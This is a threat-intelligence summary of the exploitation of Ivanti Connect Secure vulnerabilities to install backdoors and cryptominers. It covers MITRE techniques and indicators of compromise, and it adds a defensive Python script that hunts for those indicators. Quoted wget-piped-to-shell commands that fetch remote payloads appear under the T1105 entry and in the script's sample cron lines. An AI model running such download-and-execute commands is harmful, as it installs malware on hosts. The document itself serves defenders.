Ivanti Connect Secure vulnerabilities CVE-2023-46805 and CVE-2024-21887 are being exploited to install backdoors and cryptominers, with multiple payloads and persistence mechanisms observed. The write-up details three distinct payloads, their download and persistence chains, Go/UPX-packed components, and a range of IOCs defenders can use to block the activity. #IvantiConnectSecure #CVE-2023-46805 #CVE-2024-21887 #cryptominer #watchd0g #watchbog #Greynoise
Keypoints
- Exploits Ivanti Connect Secure vulnerabilities CVE-2023-46805 and CVE-2024-21887 using a public exploit.
- Payload 1 installs a persistent backdoor via cron and downloads a 64-bit backdoor binary.
- Payload 2 fetches and executes additional malware (m.sh) from GitHub, including watchd0g/watchbog components; files are UPX-packed.
- Payload 3 downloads a script to deploy a Monero miner via an SSH-based backdoor, and sets up systemd services and config JSON.
- Indicators include multiple SHA-256 hashes, suspicious paths (e.g., /etc/, /tmp/watchd0g), and IPs such as 45.130.22.219 and 192.252.183.116, plus GitHub/raw URLs.
- Defenders are advised to look for /tmp/watchd0g and /tmp/watchbog, the .ssh_miner systemd service, and related cron entries as early signs of compromise.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The payloads are exploiting vulnerabilities in Ivanti Connect Secure to gain access. “payloads are all leveraging a pair of vulnerabilities in Ivanti Connect Secure – CVE-2023-46805 and CVE-2024-21887, written about here, and with a public exploit available.”
- [T1053.005] Scheduled Task/Job: Cron – The backdoor is installed as a persistent cron job. “As of writing, that file is live and installs a persistent backdoor using cron:”
- [T1027.001] Obfuscated/Compressed Files and Information – Several payloads are UPX-packed or appear obfuscated (Go binaries). “Those files appear to be written in Go and somewhat obfuscated (or maybe Go always looks obfuscated?)”
- [T1105] Ingress Tool Transfer – The attackers download payloads from remote servers (wget/curl) to fetch binaries and scripts. “wget --timeout=20 --no-check-certificate -q -O- https://[ip]/ivanti.js|sh;n” and “wget https://raw.githubusercontent.com/[momika233]/test/main/m.sh”
- [T1059.004] Unix Shell – The campaigns rely on Unix shell commands (wget, curl, sh, bash) to fetch and execute payloads. “type curl && curl -o /tmp/script.sh …” and the decoded commands show shell execution patterns.
- [T1543.003] Create or Modify Systemd Service (Linux) – The activity includes installing a systemd service (and a .profile backdoor). “That appears to install an ssh server, install a .json configuration file, and set up a systemd service, as well as a backdoor in the user’s .profile file.”
Indicators of Compromise
- [Path] – /etc/, /tmp/watchd0g, and 2 more paths
- [Path] – /tmp/watchbog, /tmp/script.sh, and 2 more paths
- [Path] – $HOME/.ssh/config.json, $HOME/.ssh/sshd, and 2 more paths
- [IP] – 45.130.22.219, 192.252.183.116, and 1 more IP
- [URL] – https://raw.githubusercontent.com/momika233/test/main/m.sh, and 1 more URL
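As an added example (not code from the GreyNoise post, nor any of the tooling it describes), a small Python hunt that checks a host's crontab lines, a file listing and its systemd unit names against the paths, IPs, URL and service name listed above, plus the wget/curl-pipe-to-shell shape quoted under T1105. Function names and the sample input are constructed for illustration; gathering the real crontab, file list and unit directory from the host is left to the caller.

```python
import re

# Indicators listed in this write-up: file paths, network IOCs and the systemd service name
IOC_PATH_FRAGMENTS = ["/tmp/watchd0g", "/tmp/watchbog", "/tmp/script.sh",
                      ".ssh/config.json", ".ssh/sshd"]
IOC_NETWORK = ["45.130.22.219", "192.252.183.116",
               "raw.githubusercontent.com/momika233/test/main/m.sh"]
IOC_SERVICE = ".ssh_miner"
# The fetch-and-pipe-to-shell shape quoted in the write-up: wget/curl ... | sh
FETCH_PIPE_SH = re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:sh|bash)\b")

def scan_cron(lines):
    """Return non-comment cron lines that reference an IOC or pipe a download into a shell."""
    hits = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if (any(p in line for p in IOC_PATH_FRAGMENTS)
                or any(n in line for n in IOC_NETWORK)
                or FETCH_PIPE_SH.search(line)):
            hits.append(line)
    return hits

def scan_paths(present_paths):
    """Return paths that end in one of the IOC path fragments (covers the $HOME-relative ones)."""
    return [p for p in present_paths if any(p.endswith(f) for f in IOC_PATH_FRAGMENTS)]

def scan_units(unit_names):
    """Return systemd unit names that contain the .ssh_miner service name."""
    return [u for u in unit_names if IOC_SERVICE in u]

def hunt(cron_lines, present_paths, unit_names):
    """Run every check and return a dict holding only the non-empty findings."""
    findings = {"cron": scan_cron(cron_lines), "paths": scan_paths(present_paths),
                "units": scan_units(unit_names)}
    return {kind: items for kind, items in findings.items() if items}

if __name__ == "__main__":
    # Constructed sample input (not from the write-up): a crontab, a file listing, a unit directory
    sample_cron = [
        "# m h dom mon dow command",
        "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
        "*/5 * * * * wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh",
        "@reboot /tmp/watchd0g",
    ]
    sample_paths = ["/tmp/watchbog", "/etc/passwd", "/home/user/.ssh/config.json"]
    sample_units = ["sshd.service", ".ssh_miner.service"]
    for kind, items in hunt(sample_cron, sample_paths, sample_units).items():
        print(f"[{kind}] {items}")
```

A hit on any of the three checks is a reason to pull the host for forensic review; the cron check also flags any download piped straight into a shell, which goes beyond the exact commands the write-up quotes.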
Read more: https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers